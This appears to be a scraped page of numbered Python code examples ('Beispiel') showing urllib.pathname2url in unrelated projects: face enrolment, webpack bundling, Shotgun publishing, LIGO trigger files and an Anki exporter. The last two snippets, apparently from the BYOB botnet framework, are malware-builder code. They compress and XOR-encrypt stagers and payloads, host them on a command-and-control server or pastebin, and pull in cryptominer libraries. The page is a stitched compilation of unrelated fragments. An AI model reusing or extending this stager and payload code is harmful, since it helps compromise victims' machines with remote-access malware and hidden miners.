    imageFolder = os.path.join(currentDir, "dataset/" + str(sys.argv[1]))
    person_id = get_person_id()
    for filename in os.listdir(imageFolder):
        if filename.endswith(".jpg"):
            print(filename)
            imgurl = urllib.pathname2url(os.path.join(imageFolder, filename))
            res = CF.face.detect(imgurl)
            if len(res) != 1:
                print "No face detected in image"
            else:
                res = CF.person.add_face(imgurl, personGroupId, person_id)
                print(res)
            time.sleep(6)
Beispiel #35
0
def webpack(config_file, watch_config=None, watch_source=None):
    if not settings.BUNDLE_ROOT:
        raise ImproperlyConfigured(
            'webpack.conf.settings.BUNDLE_ROOT has not been defined.')

    if not settings.BUNDLE_URL:
        raise ImproperlyConfigured(
            'webpack.conf.settings.BUNDLE_URL has not been defined.')

    if not os.path.isabs(config_file):
        abs_path = staticfiles.find(config_file)
        if not abs_path:
            raise ConfigFileNotFound(config_file)
        config_file = abs_path

    if not os.path.exists(config_file):
        raise ConfigFileNotFound(config_file)

    if watch_config is None:
        watch_config = settings.WATCH_CONFIG_FILES

    if watch_source is None:
        watch_source = settings.WATCH_SOURCE_FILES

    try:
        output = js_host_function.call(
            config=config_file,
            watch=watch_source,
            watchDelay=settings.WATCH_DELAY,
            watchConfig=watch_config,
            cache=False,
            fullStats=settings.OUTPUT_FULL_STATS,
            bundleDir=settings.get_path_to_bundle_dir(),
        )
    except FunctionError as e:
        raise six.reraise(BundlingError, BundlingError(*e.args),
                          sys.exc_info()[2])

    stats = json.loads(output)

    if stats['errors']:
        raise BundlingError('{}\n\n{}'.format(config_file,
                                              '\n\n'.join(stats['errors'])))

    if stats['warnings']:
        warnings.warn(stats['warnings'], WebpackWarning)

    # Generate contextual information about the generated assets
    stats['urlsToAssets'] = {}
    path_to_bundle_dir = settings.get_path_to_bundle_dir()
    for asset, config_file in six.iteritems(stats['pathsToAssets']):
        if path_to_bundle_dir in config_file:
            rel_path = config_file[len(path_to_bundle_dir):]
            rel_url = pathname2url(rel_path)
            if rel_url.startswith('/'):
                rel_url = rel_url[1:]
            url = '{}{}/{}/{}'.format(settings.BUNDLE_URL, settings.OUTPUT_DIR,
                                      settings.BUNDLE_DIR, rel_url)
            stats['urlsToAssets'][asset] = url

    return WebpackBundle(stats)
def get_safe_text(text):
    return urllib.pathname2url(text.encode('ascii', 'xmlcharrefreplace'))
def GetRelativeUrl(module, base_module):
    return urllib.pathname2url(
        os.path.relpath(module.path, os.path.dirname(base_module.path)))
Beispiel #38
0
 def wsdlURL(self, wsdl_name):
     wsdl_file_path = os.path.join(self.wsdl_dir, wsdl_name)
     # Get the os specific url to deal with windows drive letter
     wsdl_file_url = urllib.pathname2url(wsdl_file_path)
     wsdl_url = urlparse.urljoin('file://', wsdl_file_url)
     return wsdl_url
Beispiel #39
0
import glob, urllib
import mimetypes

simple_message = """\
From: allan
Content-Type: text/plain

Hello!
"""

# msg = email.message_from_string(simple_message)
# msg = email.message_from_file(open("RESPR1779.msg"))
# email.message_from_file(open())

for file in glob.glob("*"):
    url = urllib.pathname2url(file)
    print(file, mimetypes.guess_type(url))

#print("head", msg.items())
#print("content_type", msg.get_content_type())
#print("body", msg.get_payload())



multipart_message = """\
From: allan
Content-Type: multipart/alternative; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
Beispiel #40
0
 def to_uri(path):
     return urlparse.urljoin("file:", urllib.pathname2url(os.path.abspath(path)))
Beispiel #41
0
def pathname2fileurl(pathname):
    """Returns a file:// URL for pathname. Handles OS-specific conversions."""
    return urljoin('file:', urllib.pathname2url(pathname))
Beispiel #42
0
    def display(self, gui):
        """display the planning and set is title with the name
		 of the owner (class X, campus X, user X, manager X ...)
		 get gtk object, initialize button..."""

        from GtkMapper import GtkMapper

        if gui.tabs_is_displayed(self):
            gui.tabs_go_to(self)
            return

        # - set up internal var
        self.refresh = True
        self.finish = False
        file = os.path.abspath('graphics/fullcalendar/view.html')
        self.uri = 'file:' + urllib.pathname2url(file)
        self.display_univ = False
        self.display_campus = False
        self.display_class = False
        self.display_period = False
        self.view_mode = VIEW_MODE_WEEK
        self.date = datetime.date.today()
        self.planning_stack = [self.id]

        # - generate description and title
        if self.type_user:
            if self.type_user.login == app.user.login:
                # current user planning
                self.title = "Mon planning"
            elif self.type_user.type == 'student':
                self.title = str("Etudiant " + self.type_user.login)
            elif self.type_user.type == 'manager':
                self.title = str("Manager " + self.type_user.login)
            elif self.type_user.type == 'admin':
                self.title = str("Administrateur " + self.type_user.login)
            elif self.type_user.type == 'teacher':
                self.title = str("Enseignant " + self.type_user.login)
            self.description = str("Planning de " + self.type_user.firstname +
                                   " " + self.type_user.name)
            if self.type_user.student_class:
                student_class = self.type_user.student_class
                campus = student_class.campus
                self.description += str("\nClasse " + student_class.name)
                self.description += str("\nCampus " + campus.name)

        elif self.type_class:
            self.title = "Classe " + self.type_class.name
            self.description = str("Planning de la classe " +
                                   self.type_class.name)
            self.description += str("\nCampus " + self.type_class.campus.name)
        elif self.type_campus:
            self.title = "Campus " + self.type_campus.name
            self.description = str("Planning du campus " +
                                   self.type_campus.name)
        elif self.type_period:
            self.title = "Période " + self.type_period.name
            self.description = str("Planning de la période " +
                                   self.type_period.name)
        elif self.type_univ:
            self.title = "Université " + self.type_univ.name
            self.description = str("Planning de l'université " +
                                   self.type_univ.name)
        else:
            # should never happen
            print 'unknow planning'
            self.title = "Planning"
            self.description = str("Planning inconnu")

        # - set up gui component
        mapper = GtkMapper('graphics/view_planning.glade', self, app.debug)
        # - set up view gui
        self.toolbar.description.set_text(self.description)
        self.update_date()
        # - set up menu_top gui
        self.calendar.select_month(self.date.month - 1, self.date.year)
        self.calendar.select_day(self.date.day)
        self.calendar.mark_day(self.date.day)
        # - set up html browser with fullcalendar
        self.browser = webkit.WebView()
        self.fullcalendar.add(self.browser)
        self.browser.connect('resource-request-starting', \
            self.resource_request_starting, self)
        self.browser.connect('load-finished', self.load_finished)
        self.browser.connect('title-changed', self.title_changed)
        self.browser.connect('button_press_event', self.button_click)
        self.browser.open(self.uri)
        # - call gui to add widgets,
        gui.tabs_create(self.title, self)
        # - init planning merge
        self.planning_parent = {}
        self.get_planning(self.planning_parent, False)
        self.cb_check_opt_availability()
Beispiel #43
0
 def path_to_url(path):
     return pathname2url(path.encode('UTF-8'))
def path2url(path):
    """
    Converts a file path into a file URL
    """
    return urlparse.urljoin('file:', urllib.pathname2url(path))
def pathname2url(filename):
    if PYVER >= 3:
        return urllib.request.pathname2url(filename)
    else:
        return urllib.pathname2url(filename)
Beispiel #46
0
def _create_published_file(tk,
                           context,
                           path,
                           name,
                           version_number,
                           task,
                           comment,
                           published_file_type,
                           created_by_user,
                           created_at,
                           version_entity,
                           sg_fields=None,
                           dry_run=False):
    """
    Creates a publish entity in shotgun given some standard fields.

    :param tk: :class:`~sgtk.Sgtk` instance
    :param context: A :class:`~sgtk.Context` to associate with the publish. This will
                    populate the ``task`` and ``entity`` link in Shotgun.
    :param path: The path to the file or sequence we want to publish. If the
                 path is a sequence path it will be abstracted so that
                 any sequence keys are replaced with their default values.
    :param name: A name, without version number, which helps distinguish
               this publish from other publishes. This is typically
               used for grouping inside of Shotgun so that all the
               versions of the same "file" can be grouped into a cluster.
               For example, for a Maya publish, where we track only
               the scene name, the name would simply be that: the scene
               name. For something like a render, it could be the scene
               name, the name of the AOV and the name of the render layer.
    :param version_number: The version number of the item we are publishing.
    :param task: Shotgun Task dictionary to associate with publish or ``None``
    :param comment: Comments string to associate with publish
    :param published_file_type: Shotgun publish type dictionary to
                associate with publish
    :param created_by_user: User entity to associate with publish or ``None``
                if current user (via :meth:`sgtk.util.get_current_user`)
                should be used.
    :param created_at: Timestamp to associate with publish or None for default.
    :param version_entity: Version dictionary to associate with publish or ``None``.
    :param sg_fields: Dictionary of additional data to add to publish.
    :param dry_run: Don't actually create the published file entry. Simply
                    return the data dictionary that would be supplied.

    :returns: The result of the shotgun API create method.
    """

    data = {
        "description": comment,
        "name": name,
        "task": task,
        "version_number": version_number,
    }

    # we set the optional additional fields first so we don't allow overwriting the standard parameters
    if sg_fields is None:
        sg_fields = {}
    data.update(sg_fields)

    if created_by_user:
        data["created_by"] = created_by_user
    else:
        # use current user
        sg_user = login.get_current_user(tk)
        if sg_user:
            data["created_by"] = sg_user

    if created_at:
        data["created_at"] = created_at

    published_file_entity_type = get_published_file_entity_type(tk)

    if published_file_type:
        if published_file_entity_type == "PublishedFile":
            data["published_file_type"] = published_file_type
        else:
            # using legacy type TankPublishedFile
            data["tank_type"] = published_file_type

    if version_entity:
        data["version"] = version_entity

    # Determine the value of the link field based on the given context
    if context.project is None:
        # when running toolkit as a standalone plugin, the context may be
        # empty and not contain a project. Publishes are project entities
        # in Shotgun, so we cannot proceed without a project.
        raise TankError(
            "Your context needs to at least have a project set in order to publish."
        )

    elif context.entity is None:
        # If the context does not have an entity, link it up to the project.
        # This happens for project specific workflows such as editorial
        # workflows, ingest and when running zero config toolkit plugins in
        # a generic project mode.
        data["entity"] = context.project

    else:
        data["entity"] = context.entity

    # set the associated project
    data["project"] = context.project

    # Check if path is a url or a straight file path.  Path
    # is assumed to be a url if it has a scheme:
    #
    #     scheme://netloc/path
    #
    path_is_url = False
    res = urlparse.urlparse(path)
    if res.scheme:
        # handle Windows drive letters - note this adds a limitation
        # but one that is not likely to be a problem as single-character
        # schemes are unlikely!
        if len(res.scheme) > 1 or not res.scheme.isalpha():
            path_is_url = True

    # naming and path logic is different depending on url
    if path_is_url:

        # extract name from url:
        #
        # scheme://hostname.com/path/to/file.ext -> file.ext
        # scheme://hostname.com -> hostname.com
        if res.path:
            # scheme://hostname.com/path/to/file.ext -> file.ext
            data["code"] = res.path.split("/")[-1]
        else:
            # scheme://hostname.com -> hostname.com
            data["code"] = res.netloc

        # make sure that the url is escaped property, otherwise
        # shotgun might not accept it.
        #
        # for quoting logic, see bugfix here:
        # http://svn.python.org/view/python/trunk/Lib/urllib.py?r1=71780&r2=71779&pathrev=71780
        #
        # note: by applying a safe pattern like this, we guarantee that already quoted paths
        #       are not touched, e.g. quote('foo bar') == quote('foo%20bar')
        data["path"] = {
            "url": urllib.quote(path, safe="%/:=&?~#+!$,;'@()*[]"),
            "name": data["code"]  # same as publish name
        }

    else:

        # normalize the path to native slashes
        norm_path = ShotgunPath.normalize(path)
        if norm_path != path:
            log.debug("Normalized input path '%s' -> '%s'" % (path, norm_path))
            path = norm_path

        # convert the abstract fields to their defaults
        path = _translate_abstract_fields(tk, path)

        # name of publish is the filename
        data["code"] = os.path.basename(path)

        # Make path platform agnostic and determine if it belongs
        # to a storage that is associated with this toolkit config.
        storage_name, path_cache = _calc_path_cache(tk, path)

        if path_cache:

            # there is a toolkit storage mapping defined for this storage
            log.debug("The path '%s' is associated with config root '%s'." %
                      (path, storage_name))
            # specify the full path in shotgun
            data["path"] = {"local_path": path}

            # note - #30005 - there appears to be an issue on the serverside
            # related to the explicit storage format and paths containing
            # sequence tokens such as %04d. Commenting out the logic to handle
            # the new explicit storage format for the time being while this is
            # being investigated.

            # # check if the shotgun server supports the storage and relative_path parameters
            # # which allows us to specify exactly which storage to bind a publish to rather
            # # than relying on Shotgun to compute this
            # supports_specific_storage_syntax = (
            #     hasattr(tk.shotgun, "server_caps") and
            #     tk.shotgun.server_caps.version and
            #     tk.shotgun.server_caps.version >= (6, 3, 17)
            # )
            #
            # if supports_specific_storage_syntax:
            #     # explicitly pass relative path and storage to shotgun
            #     storage = tk.shotgun.find_one("LocalStorage", [["code", "is", storage_name]])
            #
            #     if storage is None:
            #         # there is no storage in Shotgun that matches the one toolkit expects.
            #         # this *may* be ok because there may be another storage in Shotgun that
            #         # magically picks up the publishes and associates with them. In this case,
            #         # issue a warning and fall back on the server-side functionality
            #         log.warning(
            #             "Could not find the expected storage '%s' in Shotgun to associate "
            #             "publish '%s' with - falling back to Shotgun's built-in storage "
            #             "resolution logic. It is recommended that you add the '%s' storage "
            #             "to Shotgun" % (storage_name, path, storage_name))
            #         data["path"] = {"local_path": path}
            #
            #     else:
            #         data["path"] = {"relative_path": path_cache, "local_storage": storage}
            #
            # else:
            #     # use previous syntax where we pass the whole path to Shotgun
            #     # and shotgun will do the storage/relative path split server side.
            #     # This operation may do unexpected things if you have multiple
            #     # storages that are identical or overlapping
            #     data["path"] = {"local_path": path}

            # fill in the path cache field which is used for filtering in Shotgun
            # (because SG does not support
            data["path_cache"] = path_cache

        else:

            # path does not map to any configured root - fall back gracefully:
            # 1. look for storages in Shotgun and see if we can create a local path
            # 2. failing that, just register the entry as a file:// resource.
            log.debug("Path '%s' does not have an associated config root." %
                      path)
            log.debug(
                "Will check shotgun local storages to see if there is a match."
            )

            matching_local_storage = False
            for storage in get_cached_local_storages(tk):
                local_storage_path = ShotgunPath.from_shotgun_dict(
                    storage).current_os
                # assume case preserving file systems rather than case sensitive
                if local_storage_path and path.lower().startswith(
                        local_storage_path.lower()):
                    log.debug("Path matches Shotgun local storage '%s'" %
                              storage["code"])
                    matching_local_storage = True
                    break

            if matching_local_storage:
                # there is a local storage matching this path
                # so use that when publishing
                data["path"] = {"local_path": path}

            else:
                # no local storage defined so publish as a file:// url
                log.debug("No local storage matching path '%s' - path will be "
                          "registered as a file:// url." % (path, ))

                # (see http://stackoverflow.com/questions/11687478/convert-a-filename-to-a-file-url)
                file_url = urlparse.urljoin("file:", urllib.pathname2url(path))
                log.debug("Converting '%s' -> '%s'" % (path, file_url))
                data["path"] = {
                    "url": file_url,
                    "name": data["code"]  # same as publish name
                }

    # now call out to hook just before publishing
    data = tk.execute_core_hook(constants.TANK_PUBLISH_HOOK_NAME,
                                shotgun_data=data,
                                context=context)

    if dry_run:
        # add the publish type to be as consistent as possible
        data["type"] = published_file_entity_type
        log.debug(
            "Dry run. Simply returning the data that would be sent to SG: %s" %
            pprint.pformat(data))
        return data
    else:
        log.debug("Registering publish in Shotgun: %s" % pprint.pformat(data))
        return tk.shotgun.create(published_file_entity_type, data)
 def _url_encode(self, url):
     # TODO: to test
     return urllib.pathname2url(url.encode('utf8'))
Beispiel #48
0
def make_exttrig_file(cp, ifos, sci_seg, out_dir):
    '''
    Make an ExtTrig xml file containing information on the external trigger

    Parameters
    ----------
    cp : pycbc.workflow.configuration.WorkflowConfigParser object
    The parsed configuration options of a pycbc.workflow.core.Workflow.

    ifos : str
    String containing the analysis interferometer IDs.

    sci_seg : glue.segments.segment
    The science segment for the analysis run.

    out_dir : str
    The output directory, destination for xml file.

    Returns
    -------
    xml_file : pycbc.workflow.File object
    The xml file with external trigger information.

    '''
    # Initialise objects
    xmldoc = ligolw.Document()
    xmldoc.appendChild(ligolw.LIGO_LW())
    tbl = lsctables.New(lsctables.ExtTriggersTable)
    cols = tbl.validcolumns
    xmldoc.childNodes[-1].appendChild(tbl)
    row = tbl.appendRow()

    # Add known attributes for this GRB
    setattr(row, "event_ra", float(cp.get("workflow", "ra")))
    setattr(row, "event_dec", float(cp.get("workflow", "dec")))
    setattr(row, "start_time", int(cp.get("workflow", "trigger-time")))
    setattr(row, "event_number_grb", str(cp.get("workflow", "trigger-name")))

    # Fill in all empty rows
    for entry in cols.keys():
        if not hasattr(row, entry):
            if cols[entry] in ['real_4', 'real_8']:
                setattr(row, entry, 0.)
            elif cols[entry] == 'int_4s':
                setattr(row, entry, 0)
            elif cols[entry] == 'lstring':
                setattr(row, entry, '')
            elif entry == 'process_id':
                row.process_id = ilwd.ilwdchar("external_trigger:process_id:0")
            elif entry == 'event_id':
                row.event_id = ilwd.ilwdchar("external_trigger:event_id:0")
            else:
                print("Column %s not recognized" % (entry), file=sys.stderr)
                raise ValueError

    # Save file
    xml_file_name = "triggerGRB%s.xml" % str(cp.get("workflow",
                                                    "trigger-name"))
    xml_file_path = os.path.join(out_dir, xml_file_name)
    utils.write_filename(xmldoc, xml_file_path)
    xml_file_url = urlparse.urljoin("file:",
                                    urllib.pathname2url(xml_file_path))
    xml_file = File(ifos, xml_file_name, sci_seg, file_url=xml_file_url)
    xml_file.PFN(xml_file_url, site="local")

    return xml_file
Beispiel #49
0
def open_browser(path):
    try:
        from urllib import pathname2url
    except:
        from urllib.request import pathname2url
    webbrowser.open("file://" + pathname2url(os.path.abspath(path)))
Beispiel #50
0
def pathname2url(path):
    ''' This filter convert a path to a file to a url
    :param string path: path to a file
    :returns: The string of the path
    '''
    return urllib.pathname2url(path)
Beispiel #51
0
 def __str__(self):
     return urlparse.urlunsplit(
         (self.scheme, self.netloc, urllib.pathname2url(self.path),
          self.query, self.fragment))
Beispiel #52
0
def url_for_file_path(file_path):
    abs_path = os.path.abspath(file_path)
    return urlparse.urljoin('file:', urllib.pathname2url(abs_path))
Beispiel #53
0

outdir = args.outdir
try:
    os.makedirs(outdir)
except OSError as e:
    pass

datasets = [
    d for d in os.listdir(args.root) if os.path.isdir(join(args.root, d))
]
n = 5
pages = [
    datasets[i:min(len(datasets), i + n)] for i in range(0, len(datasets), n)
]

idx = open(join(outdir, 'index.html'), 'w')
print("<html><body><ol>", file=idx)
for i, page in enumerate(pages):
    print(i + 1)
    outpath = join(outdir, 'report-page-{:04}.html'.format(i + 1))

    print("<li><a href={url}>{url}</a>".format(
        url=pathname2url(os.path.relpath(outpath, outdir))),
          file=idx)
    save_html(outpath, args.root, page)

print("</ol></body></html>", file=idx)

webbrowser.open(join(outdir, 'index.html'))
Beispiel #54
0
def file_line(file_name, full_path, level):
    return ('\t' * level) + '- [%s](%s)' % (os.path.splitext(file_name)[0],
                                            urllib.pathname2url(full_path))
Beispiel #55
0
def sanepathname2url(path):
    urlpath = urllib.pathname2url(path)
    if os.name == "nt" and urlpath.startswith("///"):
        urlpath = urlpath[2:]
    # XXX don't ask me about the mac...
    return urlpath
Beispiel #56
0
def directory_line(file_name, full_path, level):
    has_readme = os.path.isfile(os.path.join(full_path, 'README.md'))
    return ('\t' *
            level) + '- ' + (file_name if not has_readme else '[%s](%s)' %
                             (file_name, urllib.pathname2url(full_path)))
Beispiel #57
0
 def constructLocalFileUrl(self, filePath):
     return "file://%s" % urllib.pathname2url(os.path.abspath(filePath))
Beispiel #58
0
def main():
    """Entry point for addon execution."""

    path_dict = anki_paths()

    #if user output directory doesn't exist, create it
    if not os.path.exists(path_dict["user"]):
        os.makedirs(path_dict["user"])

    #if user settings doesn't exist. copy over default xml
    if not os.path.isfile(path_dict["user_xml"]):
        copyfile(path_dict["addon_xml"], path_dict["user_xml"])

    #parse xml into group and error dictionaries
    xml_dicts = xmltools.parse_xml(path_dict["user_xml"])

    #check if pdf output is possible
    (pdf_status,
     path_dict["wkhtmltopdf"]) = check_wkhtmltopdf(path_dict["addon"])

    #create dialog window
    dialog = DialogWindow(*xml_dicts, pdf_status=pdf_status)

    #run dialog window and catch closing signal
    signal = dialog.window.exec_()

    #if window is accepted, collect and return user input
    if signal:
        dimensions, selections, style_text = dialog.collect_input()

    #if the dialog is closed without printing, just return to anki
    else:
        return

    #save user settings to xml
    xmltools.write_xml(dimensions, selections, style_text,
                       path_dict["user_xml"])

    #convert selections to better form
    units = "in" if selections[0] == 1 else "mm"
    image_separation = True if selections[1] == 2 else False
    pdf_output = True if selections[2] == 2 else False

    #progress bar start
    #TODO: add cancellable to options when Anki is updated
    mw.progress.start(label="Converting cards...", immediate=True)

    #output cards as html file
    convert.create_html(dimensions, units, image_separation, style_text,
                        path_dict["html"])

    if pdf_output:
        #output cards as html file
        convert.create_pdf(dimensions, units, path_dict)
        key = "pdf"
    else:
        key = "html"

    #progress bar close
    mw.progress.finish()

    #open file
    file_link = urlparse.urljoin("file:", urllib.pathname2url(path_dict[key]))
    QtGui.QDesktopServices.openUrl(QtCore.QUrl(file_link))

    return
Beispiel #59
0
def _stager(options, **kwargs):
    #util.display("\n[>]", color='green', style='bright', end=' ')
    #util.display("Stager", color='reset', style='bright')

    assert 'url' in kwargs, "missing keyword argument 'url'"
    assert 'key' in kwargs, "missing keyword argument 'key'"
    assert 'var' in kwargs, "missing keyword argument 'var'"

    if options.encrypt:
        stager = open('core/stagers.py', 'r').read() + generators.main(
            'run', url=kwargs['url'], key=kwargs['key'])
    else:
        stager = open('core/stagers.py', 'r').read() + generators.main(
            'run', url=kwargs['url'])

    if not os.path.isdir('modules/stagers'):
        try:
            os.mkdir('modules/stagers')
        except OSError:
            util.log(
                "Permission denied: unable to make directory './modules/stagers/'"
            )

    if options.compress:
        #util.display("\tCompressing stager... ", color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(stager)
        __load__.set()
        _update(stager, output, task='Compression')
        stager = output

    #util.display("\tUploading stager... ", color='reset', style='normal', end=' ')
    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(stager, options.pastebin)
    else:
        dirs = [
            'modules/stagers', 'byob/modules/stagers',
            'byob/byob/modules/stagers'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(stager)

        s = 'http://{}:{}/{}'.format(
            C2_HOST,
            int(C2_PORT) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    __load__.set()
    #util.display("(hosting stager at: {})".format(url), color='reset', style='dim')
    return url
Beispiel #60
0
def _payload(options, **kwargs):
    #util.display("\n[>]", color='green', style='bright', end=' ')
    #util.display("Payload", color='reset', style='bright')

    assert 'var' in kwargs, "missing keyword argument 'var'"
    assert 'modules' in kwargs, "missing keyword argument 'modules'"
    assert 'imports' in kwargs, "missing keyword argument 'imports'"

    loader = open('core/loader.py', 'r').read(
    )  #, generators.loader(host=C2_HOST, port=int(C2_PORT)+2, packages=list(kwargs['hidden']))))

    test_imports = '\n'.join([
        'import ' + i for i in list(kwargs['hidden'])
        if i not in ['StringIO', '_winreg', 'pycryptonight', 'pyrx']
    ])
    potential_imports = '''
try:
    import pycryptonight
    import pyrx
except ImportError: pass
'''

    modules = '\n'.join(([
        open(module, 'r').read().partition('# main')[2]
        for module in kwargs['modules']
    ] + [
        generators.main(
            'Payload', **{
                "host": C2_HOST,
                "port": C2_PORT,
                "pastebin": options.pastebin if options.pastebin else str(),
                "gui": "1" if options.gui else str(),
                "owner": options.owner
            }) + '_payload.run()'
    ]))
    payload = '\n'.join((loader, test_imports, potential_imports, modules))

    if not os.path.isdir('modules/payloads'):
        try:
            os.mkdir('modules/payloads')
        except OSError:
            util.log(
                "Permission denied: unabled to make directory './modules/payloads/'"
            )

    if options.compress:
        #util.display("\tCompressing payload... ", color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = generators.compress(payload)
        __load__.set()
        _update(payload, output, task='Compression')
        payload = output

    if options.encrypt:
        assert 'key' in kwargs, "missing keyword argument 'key' required for option 'encrypt'"
        #util.display("\tEncrypting payload... ".format(kwargs['key']), color='reset', style='normal', end=' ')
        __load__ = threading.Event()
        __spin__ = _spinner(__load__)
        output = security.encrypt_xor(payload, base64.b64decode(kwargs['key']))
        __load__.set()
        _update(payload, output, task='Encryption')
        payload = output

    #util.display("\tUploading payload... ", color='reset', style='normal', end=' ')

    __load__ = threading.Event()
    __spin__ = _spinner(__load__)

    if options.pastebin:
        assert options.pastebin, "missing argument 'pastebin' required for option 'pastebin'"
        url = util.pastebin(payload, options.pastebin)
    else:
        dirs = [
            'modules/payloads', 'byob/modules/payloads',
            'byob/byob/modules/payloads'
        ]
        dirname = '.'
        for d in dirs:
            if os.path.isdir(d):
                dirname = d

        path = os.path.join(os.path.abspath(dirname), kwargs['var'] + '.py')

        with open(path, 'w') as fp:
            fp.write(payload)

        s = 'http://{}:{}/{}'.format(
            C2_HOST,
            int(C2_PORT) + 1,
            pathname2url(path.replace(os.path.join(os.getcwd(), 'modules'),
                                      '')))
        s = urlparse.urlsplit(s)
        url = urlparse.urlunsplit(
            (s.scheme, s.netloc, os.path.normpath(s.path), s.query,
             s.fragment)).replace('\\', '/')

    __load__.set()
    #util.display("(hosting payload at: {})".format(url), color='reset', style='dim')
    return url